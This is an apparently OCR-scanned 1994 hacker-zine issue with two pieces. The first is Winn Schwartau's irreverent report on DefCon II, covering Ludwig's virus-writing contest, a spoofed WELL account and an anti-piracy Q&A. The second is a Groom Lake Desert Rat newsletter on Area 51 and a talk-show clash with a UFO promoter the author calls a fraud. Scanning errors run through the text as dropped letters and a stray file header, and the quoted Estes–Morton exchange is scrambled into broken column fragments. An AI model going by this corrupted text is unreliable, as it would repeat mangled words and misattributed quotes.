One entry? The media plastered his contest across the media- 


waves and the National Computer Security Association was planning 

a tactical nuclear response. On ntry? What kind of subver\037 
Sives have 20 year olds turned into anyway? In my day (Yeah, I’m 
old enough to use that phrase) if we called for a political 
demonstration thousands would pile through the subway turnstiles 

to meet a phalanx of well armed police appropriately attired in 
riot gear. One entry? Come on X-Generation, you can do better 
than that? No wonder the world’s going to. shit. Don’t have 
enough trouble from the young-uns. Sheeeeeeesssh! 


Mark Ludwig’s politically incorrect virus writing contest may 
have been a PR success but it was a business abortion. One 
entry. Shit. At the NCSA meeting in Washington, rivaling fac\037 
tions battled over how we as an association should respond. 


"Hang the bastard." "He’s what’s wrong with world." "Put him in 
a county jail with Billy-Bob, Jimmy-Ray and Bubba for a week and 
they’l1l be able to squeeze him out between the bars." 


C’mon you fools! Ignore him! Ignore him! If you don’t like what 
he has to say don’t egg him on. Ignore him. You want to do what 
the Feds did to poor Phil Zimmerman and make him a folk hero? 
Turning a non-event into the lead for the evening news is not the 
way to make something go away. I loudly advocated that he be 
treated as a non-entity if the goal was reduction to obscurity. 
I was right. 


Super-high priced PR and lobby firms had prepared presentation to 
wage an all-out attack on Ludwig and his contest. I bet! And who 
was going to pay for this? Peter Tippitt of Semantech ponied up 
what I believe amounted to $7,000 to get the pot going. No one 
else made a firm offer. Can’t blame them cause it would have been 
no more effective than taking out an ad in Time proclaiming that 
evil is bad. The PR firm would have made their fees, th vent 
would have mad ven more news and Ludwig would certainly have 
had to make a judgement and choose from more than one entry. 


But oddly enough, the one entry did not win. 


The winner of the Annual Virus Writing Contest was no less than 
Bob Bales, Executive Director of the NCSA. Not that Bob wrote a 
program, but if he had, Ludwig said, it would be called either 
Don Quixote or Paranoia, and it would be of the human brain at- 
tacking Meme type. Th virus is a software equivalent of Prozac 
to alleviate the suffering in middle-aged males who have no 
purpose in life other than virus busting. 


"Ts Winn Schwartau here?" Mark asked the audienc 


I was there. "Yo!" 


"Would you tell Bob that he’s won a plaque, and a $100 check and 
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a full year subscription to the Computer Virus Developments 
Quarterly." I’m the technology advisor to the NCSA so it was 
a natural request to which I was pleased to oblige. 


I told Bob about his 15 minutes of fame at DefCon to which he 


roared in laughter. "Good! Then I won’t have to subscribe my\037 
self." 
I spoke next. Jeff introduced me by saying, "Winn says he 


doesn’t want to speak to an empty room so he’s gonna talk now." 
Some introduction. But, what a great audience! Better than most 
of the security above-ground starched sphincter tight suit and 
tie conference audiences I normally get. But then again, I get 
paid handsomely to address legitimate audiences where I have to 
be politically correct. At DefCon, insulting people was the last 
thing I worried about. It was what I focused on, onstage and 
off. 


"Hey, kid. Did you ever land Zimmerman in bed?" 
"YOU; YOU; -O€ aoe at 


"C’mon kid. Give me your best shot." 


"Your mother . . ." A crowd gathered to see what kind of repar\037 
tee this little schnook could come up with. "Your mother .. a 
C’mon kid. You got it in you. C’mon. "You, she is a 5 2 
uh, . . . mother . . ." and he finally skulked away in_ sheer 
embarrassment. Poor kid. When he went to the men’s room, men 
walked out. Poor kid. I don’t think he ever figured out it was 


all a put on. 


The audience got it, though. Rather than go over what I rambled 
about for an hour, here comes a blatant plug: Go buy my new book 


"Information Warfare: Chaos on the Electronic Superhighway." 
That’1ll sum it up real nice and neat. But what a great audience. 
Thanks. 


Little did I know, though, that I was also on trial. 


John Markoff of the New York Times was the first to ask, and then 
a couple of buddies asked and then a lady asked during the QéA 
portion of my ad hoc ad lib speech. "How come you did it?" Did 
what? "How come you flamed Lenny DeCicco?" 


It turns out that someone adapted my electronic identity and 
logged on to the WELL in Sausalito, CA and proceeded to post a 
deep flame against Lenny. Among other none-too-subtl asper\037 
sions, '’my’ posting accused Lenny of a whole string of crimes of 
Information Warfare and even out and out theft. 


Except, it wasn’t me. I answered the lady’s question with, "It 
wasn’t me, I don’t know Lenny and I don’t have an account on the 
WELL." That satisfied everyon xcept for me. What happened 
and why? It seems that Lenny’s former partner in crime Most- 
Wanted on the lam federal fugitive computer hacker Kevin Mitnick 
actually wrote and signed the letter with his initials. Or 
someone was spoofing him and me at the same time. But why? And 
why me? 


It took a couple of days after arriving home from DefCon to learn 
after xtensive conversations with the WELL that my erased ac\037 
count from almost two years ago and then re-erased on June 20 of 
this year was accidentally turned back on by some mysterious 
administrative process that I cannot claim to fathom. OK, that’s 
what they said. 
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But perhaps most interesting of the entire Getting Spoofed inci\037 
dent was a single comment that Pei Chen, sysop of the WELL said 


to me while I complained about how such an awful anti-social 
attack was clearly reprehensible. Oh, it’s simple, she said. 

"W have no security." Whooaaaahhh! The WELL? No security? HE 
love it. I absolutely love it. Major service provider, no 


security. Go get ’em cowboy. 


The only other speaker I wanted to see was Peter Beruk, chief 
litigator for the Software Publisher’s Association. This is the 
Big Software Company sponsored organization which attempts to 
privately interdict illegal software distribution as a prelude 
for both civil and criminal prosecutions. And with this group of 
digital anarchists, no less. 


The SPA scrounges around 1600 private BBS’s to see who’s making 
illicit copies of Microsoft Word or Quattro For Weanies or 
Bulgarian for Bimbos or other legitimate software that the pub\037 
lishers would rather receive their due income from then being 
stolen. 


"Which boards are you on?" 

"That would be telling." Big grin and laughs. 

"Is your BBS secure?" A challenge in the making. 

"Sure is." 

"Is that an offer to see if we can break in?" Challenge made. 
"Ahem, cough, cough." Challenge denied. 


"What name do you use on the boards?" Idiot question that de\037 
serves an idiot answer. 


"Fred." Laughs. 


"You mean you have a full time guy to download software from 
boards to see if it’s legal or not?" "Yup." 


"So, you pay people to commit felonies?" Astutely stupid ques\037 
tion. 


"We have permission." 


"Why should we have to pay rip-off corporations too much money to 
use really shitty software?" 


"So. don’t ‘buy: 1." 


"We don’t. It’s so shitty that it’s barely worth stealing." 


"So don’t steal it." 


"Just want to check it out, dude." 


"Scum sucking imperialists are making all of the money. The 
software designers are getting ripped off by the big software 
bureaucracies. Power to the people." Every generation goes 
through this naively innocent berating of capitalism. It doesn’t 
make them Communists (in 1950 it did), just not full fledged 
capitalist pigs themselves yet. Soon come. Vis a vis Ludwig’s 
comment on the asset-deprived audience. Soon come, man. 


"We go after BBS’s that store illegal software." 
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"So you’re gonna put Compuserve in jail?" Big, big applause. 


Despite the openly verbal animosity between the fr ware believ\037 
ers and the Chief Software Cop, the spirited and entertaining 
disagreements maintained a healthy good natured tone that well 
exceed Peter’s time limit, as DefCon II was coming to a close. 


It was time for one more stand up comedy attempt by a short haired 
bandanna wearing hippie/hacker/phreak who was not quite up to the 
job. 


"OK, guys. We’ve had some fun at th Feds xpense. They’ re 
people, too. So, from now on, it’s Hug a Fed. Go on, find a fed 
and go up to him or her and big them a great big bear hug full of 
love." The Feds that had been busted were gone. The ones’ still 


successfully undercover weren’t about to blow it for a quick feel 
from a horny teenager. 


Next. The Cliff Stoll doll with an assortment of accessory yo- 
yos was a popular item. It was thrown pell-mell into the crowds 
who leapt at it with a vengeance like a baseball bleachers sec\037 
tion awaiting the 61st home run. 


"There used to be a Wife of Cliff Stoll doll, but no one’s’ seen 
it in two years." Cliff is strange. I don’t know if he’s’ that 
strange, but it was a funny bit. 


"Then we have the LoD/MoD action figure set starring Erik Bloo\037 
daxe and Phiber Optik." GI Joe action set gone underground. 
Corny, but appreciated as hundreds of bodies dove to catch the 
plastic relics tossed from the stage. 


If anything, an anti-climatic end to an otherwise highly informa\037 
tive and educational conference. I can hardly wait till next 
year when, after word gets out, DefCon III will be attended by 
thousands of hackers and cops and narks who will try to replay 

the Summer of Cyber-Love ’94 for a sequel. 


kK kK kK kK * 


More than anything I wanted to get away from the Sahara. Away 
from its nauseatingly chromatic carpets, it’s hundreds of sur\037 
veillance cameras, and most of all, away from its exploding 
toilets. 


We decided to play, and play we did at the new Luxor Hotel which 
is an amazing pyramid with 4000+ rooms. There are no elevators as 
in a pyramid '/going up’ is kind of useless, so Inclinators take 
passengers up the 30 some odd floors to hallways which ring 
around the impossibly huge hollowed out pyramid shaped atrium. 


This was play land. And for three hours we played and played and 
went to dumb shows that attract mid-western mamas from Noodnick, 
Kentucky, alighting in Vegas for their annual RV pilgrimage. But 
we went and enjoyed none the less. 


The "Live TV" show was anything but live except for lovely Susan 
who hosted us into the ersatz TV station. Her job is to look 
pretty, sound pretty and warm up the crowd for an over budget, 
overproduced schmaltz driven video projection that was to make us 
all feel like we were on stage with Dave. Letterman, that is. 
The effect does not work. But we enjoyed ourselves, anyway. 


Everyone here on vacation?" 


"No!" I yelled out. Poor Susan was stunned. No? Why else would 
you be here? 
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"What are you doing?" The TV audience of 500 was looking our 
way. Between the five of us we had a million dollars (give or 
take) of electronic wizardry stuffed around us, beneath us and in 
our laps. 


"Working." Gee, I’m quick. 


"What do you do?" Susan asked with a straight face. I bet’ she 
xpected something like gas pumper, or nocturnal mortuary forni\037 
cator or 7/11 clerk. 


"We’re hacking for Jesus. This is Cyber Christ!" I said pointing 
at Erik Bloodaxe. 


Silence. Dead silence again. Sleep with Phil Zimmerman silence. 
Except for us. We giggled like school boys. Psyche. 


"Ah, ‘ . . that’s nice." That was all she could come up with: 
That’s nice. So much for ad libbing or deviating from the 
script. But the TV audience enjoyed it. A whole lot. They 


finally figured out it was put on. Not every one from the Mid- 
West is as stupid as they all pretend to be. 


Then it was time to get sick. VR rides do me in, but not to be 
publicly humiliated by my 20-something cohorts (and Mike Peros 
with whom I had to travel yet another 2000 miles that night) I 
jumped right into an F-14 simulator which rotated 360 degrees on 
two gimbals for an infinite variety of nauseousness. 


"Oh, shit!" I yelled as I propelled myself forward and around and 
sideways with sufficient g-force to disgorge even the most delec\037 
table meal. "Oh, shit." I had reversed the throttle and was now 
spinning end over end backwards. My inner ear was getting my 
stomach sick. "Oh, shit." Out of the corner of my eyes my four 
pals were doubled over in laughter. Had I barfed yet and not 
known it? God, I hope not. "Oh, shit." I came to a dead stand\037 
till, the video screen showed me plummeting to earth at escape 
elocity and I pushed the throttle forward as roughly as I could. 
n innate survival instinct came in to play. "Oh, shit!" The 
irtual aircraft carrier came into sight and after almost 2 
inutes of high speed rotating revulsion, I was expected to land 
his spinning F-14 on a thimble in the ocean. Right. I tried, 
and damned if I didn’t make it. I have no idea how, but I got an 
extra 34,000 points for a safe landing. 120 seconds. Ding. 
Time’s up. 


I got out of the simulator and spilled right onto the floor; one 
42 year old pile of humanity who had navigated nausea but whose 
balance was totally beyond repair. "Could anyone hear me?" I 
asked from my knees. 


"They were selling tickets." 
"Do I get my money back?" 


Onto the VR race cars. I really thought I’d throw up to the 
amusement of a thousand onlookers. Hacking then phreaking then 
flying and now driving. I put the pedal to the metal and 
crashed. The huge video display has me tipping end over end and 
the screen is shaking and the car I’m driving is shuddering 
violently but my brain can’t compute it all. I’m gonna wretch, I 
just know it. But I keep on driving, decidedly last against 
people who haven’t been handicapped with an inner ear so sensi\037 
tive I get dizzy when I watch a 5" black and white TV. 


We tilted out of there and alas, it was time to find a 200,000 
pound of metal to glide me home. It was a damn good thing I hadn’t 


20.txt Wed Apr 26 09:43:41 2017 14 


aten before VR Land, but I wolfed down $3 hot dogs at the air\037 
port knowing full well that whatever they served on the plane 
would be a thousand times worse. So Mike and I munched, leaving 
Cyber Christ and friends to battle the press and the stars at the 
opening of Planet Hollywood at Caesar’s Palace. 


And then an unexpected surprise. Lisa and friend; our first class 
objects of flirtation from the outbound trip which seemed like a 


month ago, appeared. But we were all so wiped out that a conti\037 
nent of innuendo turned into a series of short cat naps. We got 
a few flirts in, but nothing to write home about. Red Eye 


flights are just not what they’re cracked up to be. 


As I crawled into bed at something like 7AM Eastern, my wife 


awoke enough to ask the perennial wife question. "What did you 
do all weekend?" I, in turn, gave her the usual husbandly re\037 
sponse. 


"Oh, nothing. Good night, Gracie." 


Roe Boke Oe 


(C) 1994 Winn Schwartau 


Winn Schwartau is an information security consultant, lecturer 
and, obviously, a writer. Please go buy his new book: "Informa\037 
tion Warfare: Chaos on the Electronic Superhighway." Available at 
book stores verywhere. Winn can be reached at: Voice: 


813.393.6600 or E-mail: P00506@Psilink.com 
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KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKAKKKK 


[Several of us had plans to tempt fate and join the other pop-culture 
lemmings running off to Area 51 during Defcon. The not-—so-secret 
base has seen more press this year than Madonna. Armed with 

our ICOM 2SRAs and a copy of "The Area 51 Viewer’s Guide" 

we planned to put our lives on the line purely for the sake of 

being able to say "We were there!" 


The night before we were planning on going, FOX-TV broadcast 
an episode of "Encounters" that focused heavily on Area 51. 
The thought of tromping off on our little recon adventure 
accompanied by winnebago-loads of families taking the kids 
to see "that dang UFO place from the TV," just sorta ruined 
the mood. 


Hopefully, this won’t happen to you. And if you do go, 
you really should consider getting the "viewer’s guide" 
from Glenn Campbell (psychospy@aol.com). Email him for 
a catalog of Area 51 stuff. 


Glenn also publishes an electronic mag documenting recent activities 
surrounding Area 51, and related activities. With his permission, 
Phrack is extremely please to bring you the latest issue of 

"The Groom Lake Desert Rat." 


THE GROOM LAKE DESERT RAT. An On-Line Newsletter. 
Issue #15. Sept. 2, 1994. 
> "The Naked Truth from Open Sources." <----- 

AREA 51/NELLIS RANGE/TTIR/NTS/S-—4?/WEIRD STUFF/DESERT LORE 
Written, published, copyrighted and totally disavowed by 
psychospy@aol.com. See bottom for subscription/copyright info. 
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Sa MEDIA COMMUNICATIONS 103A ----- 


SUBTLETIES OF THE TELEVISION TALK SHOW, PART I 


In DR #10, we reviewed the major news media--print, radio and 
television--and showed how each could twist reality in their own 
special way. Strictly for the sake of science, Psychospy allowed 
himself to be turned into a minor media celebrity so we could 
report to our readers the sometimes dubious processes behind the 
scenes. There was a limit, however, to how low we would sink in 
the pursuit of knowledge. We would not take off our clothes for 
the camera, and we would not place ourselves in any situation 
where our credibility, reputation or dignity could be seriously 
trashed. 
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Now we can report that this barrier has been broken. In the next 
two issues of the Rat we will recount our first-hand experiences 
with the lowest form of mass media, the television talk show. 


erie eels THE MEDIUM OF TALK ..... 


Talk shows come in three basic formats. The rarest but most 
respectable is the SERIOUS ISSUES talk show exemplified by "Meet 

the Press," "Nightline" and the roundtable discussions on PBS-- 
aybe even "Larry King Live." They are dignified and serious, 


m 
explore meaningful political and societal issues, and hardly 
anyone watches them. 


The next rung down the ladder--vapid but benign--is the CELEBRITY 
CHAT talk show, like the "The Tonight Show," "Late Show with David 
Letterman" and "Arsenio Hall." Movie stars and Big Money authors 
pump their latest work in a non-confrontational environment 
designed only to promote laughs. 


The last and lowest form of the genre is the HUMAN CONFLICT talk 
show. These syndicated programs always bear the name of the host, 
like "Oprah," "Geraldo," "Vicky" or "Leeza." He or she is a 
charismatic and camera-loving character, no doubt ruthless in real 
life, but blessed with the ability to convey warmth and sincerity 
on TV. The fodder for these shows is a steady diet of human 
suffering, crises, angst and tragedy. Former spouses and 
estranged friends face off against each other; grown men and women 
reveal to the parents their until-now-hidden perversities, and 
human oddities of all shapes and sizes present themselves for 
humiliation before a nationwide audience. The ultimate goal of 
these shows is the public expression of private feelings. They 
seek tears, anger, jealousy and graphic self-immolation recorded 
by the camera on a tight close-up. With a dozen such shows now in 
syndication, the competition is intense to seek out new forms of 
conflict and expose the latest narcissistic trends. 


Talk shows are produced "live on tape" with minimal editing, and 
this presents special problems for a guest. In other forms of 
television, sound bites rule the show. It may seem artificial, 


but tight editing at least assures that each party has their say 
and only their finest bon mot will be used. The courteous speaker 
with a few good ideas can confidently compete with any 
extravagant, microphone-hogging blowhard, because most of what the 
blowhard says will be cut. In the almost-live talk show, the more 
reasonable speaker has to compete with the blowhard head on. 

There is no time for an orderly presentation of evidence; he who 
makes the most outrageous, confident and colorful claims, 
groundless or not, gains the camera’s eye and controls the game. 


If you have any shred of personal dignity and are asked to be a 
guest on a Human Conflict show, the best response is obvious: 
"Just Say No." Unless you are a masochist or a natural born 
actor, there is no way you can win in this format. We know it 
now; we knew it then, but sometimes, like Oedipus, you just can’t 
stop the inevitable march of Fate.... 


Seyg pute ONWARD TO HUMILIATION ..... 


The path to our own downfall was indirect. For several months, a 
number of journalists have been making the pilgrimage to Freedom 
Ridge, and we generally escort them as a sort of local public 
relations representative. We do not charge for this service, and 
we do not discriminate between journalists. If TASS or Penthouse 
or the Podunk Review came to call, we would treat them no 
differently than the New York Times. 


In May, we got a call from a producer from the Montel Williams 
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Show, one of the Human Conflict shows that we had never seen. It 
seems that "Montel," as he is known to the world, had promised on 
an earlier talk show that he would visit the border of Area 51. 

We told the producer that we would be willing to escort Montel and 
his crew to Freedom Ridge to tape a segment, but we declined an 
offer to come to New York to appear on the studio show. Montel’s 
visit was originally scheduled for May 5 but was canceled at the 
last minute, and we breathed a sign of relief. 


In August, the project was reactivated, we suspect as the result 
of the June 22 article in the New York Times. Montel’s visit was 
scheduled for Aug. 16, and we were again asked if we would go to 
New York to appear on the later show. Again, we declined. 


When Montel came to Rachel, he brought a Humvee, his producers and 
a film crew. We went through the usual script for the camera: 
Montel drives up to our Research Center, and we meet him in the 
driveway. Inside, we show him where we are going on the map, then 
we get in the car and drive the rugged road to Freedom Ridge. We 
had done it before with countless crews, but never so quickly and 
in so few "takes." When Montel arrived, there was no question 
that he was in charge. He asked no significant questions, and 
showed no particular interest in the secret base itself. We 
sensed that he came only because he said he would and that his 
primary aim was to film a sound bite on the ridge that said, "You 
see, I did what I promised." 


As we rode down from Freedom Ridge in the Humvee with Montel and 
the producer, we were again asked if we would come to New York to 
appear on the talk show the following week, Aug. 23. We hesitated 
and were about to turn down the offer cold, when the producer 
uttered the only horrible words that could force us to comply. 


Sean David Morton. 


sheng ate THE EMBODIMENT OF EVIL ..... 


We first learned of Sean Morton over two years ago, before we cam 
to Rachel. We had heard his enthusiastic endorsement of the Black 
Mailbox on a UFO video: 


"Probably the most amazing thing about Area 51 is the fact that 
this is literally the only place in the world where you can go out 
and actually see flying saucers on a timetable basis. You can 
literally go out there on a Wednesday night between about seven 
and one a.m. and you’1ll see these things flying up and down the 
valley. It’s absolutely amazing. On even a bad night you’ll have 
ten, eleven, twelve sightings. On a good night--and I’ve been out 
t 
j 
16: 
a 


here with friends of mine camping--on a good night the sky will 
ust rip open with these things. You’1ll see anywhere between 
wenty to forty objects in a night testing over the base for 
nywhere from fifteen and forty minutes at a time." 


We’ve lived near the border for over a year and a half now, are 
genuinely interested in UFOs and have spent countless days and 
nights in the desert; yet we haven’t seen even ONE flying saucer, 
let alone scores. The logical explanation is that we arrived too 
late, after the saucers had been packed up and moved elsewhere. 
The trouble with this theory is that during the early part of our 
tenure, Sean Morton continued to bring tours to the area--at $99 a 


head--and reported UFOs everywhere. 


In one celebrated incident in March 1993, Psychospy spent the 
night on White Sides, overlooking Groom Lake, with some aviation 
watchers and a writer from Popular Science. We were looking for 
the alleged Aurora spyplane--almost as ephemeral as flying 
saucers-—-but we saw nothing more than a few satellites, some 
distant aircraft strobes and an occasional meteor. The following 
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was reported in the March 1994 Popular Science.... 


"Last March, three chilly airplane watchers with binoculars 
atop White Sides Mountain at this magic hour [4:45am] were 
tracking a 737 airliner approaching Groom Lake, as a fourth member 
of their group thawed out in his truck below. Parked on a knoll, 
he was next to a vanload of UFO seekers. They were lead by tour 
operator Sean Morton, whose leaflet described him as ’the world’s 
foremost UFO researcher.’ 


"Morton donned a horned Viking helmet and from time to time 
pointed to the sky, exclaiming: ’Look at that one!’ The airplane 
watcher trained his binoculars in the same direction but saw 
nothing out of the ordinary. Later, Morton’s group became excited 
by what they perceived as an entire formation of UFOs; the 
airplane watcher’s lenses revealed only stars. Finally, as the 
morning’s first 737 made its gentle approach toward Groom Lake at 
4:45, the UFO enthusiasts rejoiced at Old Faithful’s appearance. 
Everyone had seen exactly what they hoped for." 


In the beginning, when we were new to the area, we were generous 
to Sean and called him "fantasy prone." As we got to know him 
better and gained confidence in our own knowledge base, we came to 
mince no words. Sean is a deliberate con man. He recognizes as 
well as us the landing lights of a 737, but he knows that others 
can be fooled and taken for a $99 ride to see them. If anyone is 
spreading disinformation about Area 51, filling the air with noise 
to make the truth harder to grasp, it isn’t sinister government 
agents; it’s Sean David Morton pursuing only his own greed and 
self-aggrandizement. 


We have worked hard over the past 18 months to undo the damage 
Sean has done and displace him from the Area 51 scene. 
Discrediting Sean isn’t complicated: We simply quote his own 
words whenever we can. Sean is a broadly diversified charlatan, a 
self-proclaimed expert in faith healing, earthquake prediction, 
psychic prophesy and virtually every other New Age fad. We have 
no problem at all with him plying his trade within the confines of 
the state of California where he justly belongs, but when he 
proclaims himself the foremost authority on Area 51, we get 
territorial. We hope that our "Area 51 Viewers Guide" has reduced 
the gullibility of newcomers and made the environment less 
attractive for leeches like him. In fact, we haven’t hada 
confirmed Morton sighting near the border in over a year. We 
heard from sources in California that he no longer gave tours to 
Area 51 because the saucers had been moved elsewher which was 
fine by us. 


The saucers must have returned, however. As the recent Groom Lake 
publicity reached its peak, "The World’s Foremost UFO Researcher" 
could not help but resurface to suck energy from it. In recent 
months, reports began to reach us that he had appeared as an Area 
51 expert at UFO conferences, on radio talk shows and on the 
Montel Williams Show. 


In the latter appearance, which was first broadcast in December 
1993, Sean showed video footage of nighttime "UFOs" that he said 


he photographed "at great risk to my own life." As we viewed them 
later, one clip showed an isolated circle of light jumping around 
within the frame. It could have been any stationary out-of-focus 


light shot through a hand-held video camera. Notches seen on the 
top and bottom of the "disk" correspond to protrusions inside the 


lens assembly. In the other clip, only slightly out of focus, we 
saw the lights of a 737 landing on the Groom Lake airstrip. To 
Sean, it was "an object actually coming in from space." The time 


stamp in the corner said "4:49 am." 


It was on this show that Montel promised to visit Area 51 escorted 
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by Sean; yet when Montel finally made the trip eight months later, 
Sean was not invited. The producer told us that word had reached 
him from many sources that Sean was considered a fraud, that in 
addition to UFOs he also did psychic prophesies and that his 
claimed credentials were highly dubious. He and Montel felt that 
Sean had taken advantage of them and that by having him on the 
show they had inadvertently legitimized him. 


But none of that prevented them from inviting him back as a guest 
the second studio show. 


As we rode down in the Humvee from Freedom Ridge with Montel and 
the producer, the reality to us became crystal clear: If we did 
not appear on the Montel Williams Show, then Sean would have the 
stage all to himself and could continue to spread any sort of 
nonsense about Area 51. We felt that we had no choice. Either we 
did battle with this guy now, before he grew bigger, or we would 
be cleaning up his mess for many months to come. 


ates OUR RAPID EDUCATION ..... 


We had less than a week to prepare for the big show--nowhere near 
enough time to do all the research we needed. The first item of 
business was to actually watch the Montel Williams Show and 
familiarize ourselves with the format. We cranked up our 
satellite dish and surfed through the channels. On "Donahue": 
"Six Year Olds Who Sexually Harass Other Six Year Olds." On 
"Rolanda, a related topic: "Will Your Child Grow Up To Be A 
Serial Killer?" On "The Vicky Show," we heard that Sean Morton 
had just appeared as an expert on the prophesies of Nostradamus, 
but we were unable to catch that one. 


The first Montel Williams Show we saw was, "Mistresses Who Want To 
End The Affair." On the stage, thr women disguised by dark 
sunglasses explained why they had been attracted to married men. 
We could only tolerate about ten seconds at a time of this show, 
but when we tuned back, we found that the women had shed their 
sunglasses and revealed their true identities. Presumably, they 
had also revealed, or at least seriously compromised, the 
identities of the men they had been having the affairs with. When 
we tuned in again later, one of the three was having an angry 
argument with a fourth female guest. We guessed that this was the 
wife of one of the married men. 


A friend sent us a tape of Montel’s original UFO show in which 
Sean appeared as a "UFO Investigator" and Montel promised to 
visit. The show included an abductee, a witness to the "Kecksburg 
Incident," a former actress, WFUFOR Sean David Morton, a requisite 
skeptic, a pro-UFO filmmaker and--as if you hadn’t guessed--that 
talk show regular Travis Walton. The show was conducted in the 
"expanding chairs" format. It started out with two guests alone 
on the stage, then more guests and chairs were added during each 
commercial break until there were seven chairs and seven 
squabbling speakers vying for attention on the platform. In this 
format, attention is diluted with each new chair, so the people 
who appear last, typically the skeptics, usually get only a few 
seconds of airtime. During the free-for-all of a seven-person 
debate, the camera always focuses on the most aggressive and 
charismatic guest--i.e. Sean David Morton. 


The last chair to be filled was occupied by filmmaker Russ Estes, 
who the on-screen caption said, "Does Not Believe In UFOs." This 
is false. He is a disciplined UFO investigator who has devoted 
his career to making films on the subject, as well as exposing 
obvious frauds. What is true is that he "Does Not Believe In Sean 
Morton." In his few seconds of air time, he raised doubts about 
one of Morton’s many fake credentials, his claimed "Doctor of 
Divinity" degree. 
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and this is what I’ve 
is the quality of the individual who 


You know, 


is bringing m 


messag 


the-boy-that-—cried-wolf 


syndrome is phenomenal in this field. You get people out there 
who are saying, I’m this, I’m that, and I hate to do this to you, 
Sean, but here’s a guy right here who claims to be the Doctor, 
Reverend Sean David Morton. In his own biography, he claims to 
have gotten his Doctor of Divinity at--excuse me, it will take me 


one second...." 

SEAN MORTON: "Berachah University." 

RUSS ESTES: "Berachah University, Houston, Texas-—-the Berachah 
Church. I called them. They don’t have any type of degrees that 
they giv They have Bible study at the best. He claims to have 
attended University of Southern California...." 

MONTEL WILLIAMS: "So the point that you are making, Russ, is that 
there’s a problem with the messenger, so therefore the message is 
not real." 

RUSS ESTES: "How can you believe the message if the people lie to 


you from the start." 


EAN MORTON: "The thing I’d like 
ere is that if you don’t like th 
essenger, and it’s obvious to me that in the UFO field, we do 
his for free, we do this because we want to know the truth, 
cause we have seen something...." 


to point out about Mr. Estes 
message, you can shoot the 


oct BTN 


RUSS EST 


ES: "But does that mean you bogey up your credentials?" 


SEAN MORTON (angry): "That is not true. You are flat-out lying 
to these people. I went to USC for four years." 
Just then, the debate was cut off by a sloppy edit, and Sean’s USC 
diploma appeared on the screen. 


After watching the tape, we contacted Russ Estes. He said that 
the debate between he and Sean went on much longer than was shown 
on the screen. "Live on tape" does not mean totally unedited. 
This show went on for over two hours to obtain a one hour’s worth 


of material. Sometimes, whole shows are thrown out when they 


don’t work. Unfortunately, Estes made a misstep on the USC 
degree. As it turns out, this is just about the only authentic 
credential he has: a B.A. in Drama and Political Science. We 


certainly believe the Drama part: It’s the last 


needed. 


degree he ever 


The Doctor of Divinity degree is still phony, but in the talk show 
world, evidence counts for nothing; only emotions and presentation 
matter. Sean walked away from the show as a brave and 
knowledgeable crusader, legitimized by a promise from Montel to 
take his tour, and with the implied invitation to reappear on the 
s 

Ss 

S 

t 


how. Estes walked away alone, wasn’t invited to return, and has 
ince had to live down the "Does Not Believe in UFOs" moniker. 
ean even had the delightful gall to send Estes a letter, through 
he producers... 


Mr. Russ Estes 

c/o Alex Williams [sic] 
The Montel Williams Show 
1500 Broadway Suite 700 
New York, New York, 10036 
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Dear Russ: 
I am going to assume that you are not a bold faced liar who is out 


for some kind of warped revenge, or a person who is just trying to 
make a buck off baseless slander. 


Let’s try to solve this like gentlemen nclosed is a copy of my 
U.S.C. diploma. I have also called the school and my records are 
intact. The rest of your "research" on me is equally faulty. 


I hope this solves out problem. If not, I have consulted my 
attorney and any further slander directed toward me through your 
video series or elsewhere, will result in action taken against 
you. 


Yours Truly, 
[BIG signature] 
Sean Morton 


Things were beginning to look grim for Psychospy. With the time 
of the taping drawing near, we hadn’t even begun to scratch the 
surface of Sean David Morton and his path of destruction. Talking 
to our contacts, we saw that Sean had accumulated a vast audience 
of intimate enemies, more than we could possibly contact. If Sean 
sounds knowledgeable and occasionally has some meaningful 
information, it is because he has ripped it off from others. We 
were amused to find that there was even an reputable astrologer 
who hated Sean, who felt that Sean had stolen his predictions and 
passed them off as his own. 


It seemed a futile exercise anyway. We knew all the evidence in 
the world wasn’t going to matter when we actually faced off 
against Sean on camera. We were leaving behind our own 
comfortable medium of logic and data and stepping into his home 
turf--the talk show--where presentation counts more than content. 


We were obligated by our own ethics to speak only the simplest 
truths and the cautious assertions supported by data. Sean David 
Morton, bold faced liar that he is, faced no such constraints. He 


could spout any lie he wanted to sound important and get himself 
off the hook, and the only thing that mattered here was that he 
said it with apparent sincerity and that it held up for 
television’s thirty second attention span. We knew that if we 
started to make an accusation about him, he would instantly sense 
the winds and make the same one against us with greater force. 
The ensuing argument would make he and us appear to be equals. 


Sean knew all the buzzwords and cliches of the UFO movement and 
could spout the conventional wisdom much faster than we could. He 
knew how to sound sincere and reasonable and adapt instantly to 
the sentiments of any social circumstance. He was well-practiced 
at responding to inquisitions and had emerged from many without a 
scratch. Opposing him, all we had was a body of mundane knowledge 
about a very limited area of the desert. Sean was smooth and 
well-honed in his talk show delivery, and we were stumbling in for 
the first time to a medium where we really didn’t want to be. 


It was with these reservations and a sense of dark foreboding that 
we packed our bags and headed for New York City. There, in Times 
Square, w xpected a titanic battle between Good and Evil, and 
things didn’t look good for Good. 


[To be continued in Desert Rat #16....] 


Sane NEW AIR FORCE STATEMENT ON GROOM ---~-- 


The following statement was recently released to inquiring 
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journalists by the Nellis AFB public affairs office. (We 
requested our own copy from Major George Sillia on Aug. 26.) It 
represents a significant shift from the previous "We know nothing 
about Groom Lake" response. 


"There are a variety of facilities throughout the Nellis Range 
Complex. We do have facilities within the complex near the dry 
lake bed of Groom Lake. The facilities of the Nellis Range 
Complex are used for testing and training technologies, 
operations, and systems critical to th ffectiveness of U.S. 
military forces. Specific activities conducted at Nellis cannot 
be discussed any further than that." 


That’s a step in the right direction. What the base needs now is 
a name and a history. For example, tell us about the U-2 and A-12 
programs at Groom in the 1950s and 1960s. That’s not very secret 
or critical to our current defense, so what’s the point in 
pretending it is? Will the Air Force take control of the 
situation and provide this information itself, or will the void be 
filled by a dozen aggressiv ntrepreneurs? 


We’d bet our money on the entrepreneurs. 


=SSe= EG&G TO ABANDON TEST SITE ---- 


According to an 8/26 article in the Las Vegas Review-Journal, EG&G 
and its REECo subsidiary will not seek renewal of their Nevada 
Test Site contract when it expires in 1995. These are two of the 
three companies that have managed the nuclear testing ground since 
its inception. It is unclear whether this action will have any 
affect on operations at the adjoining Groom Lake base, where EG&G 
and REECo are also assumed to be major contractors. 


Recent rumors say that EG&G no longer operates the "Janet" 737 
jets that shuttle workers to Groom and Tonopah. That operation 
has supposedly been taken over by the Air Force, using the same 
aircraft and possibly the same staff. 


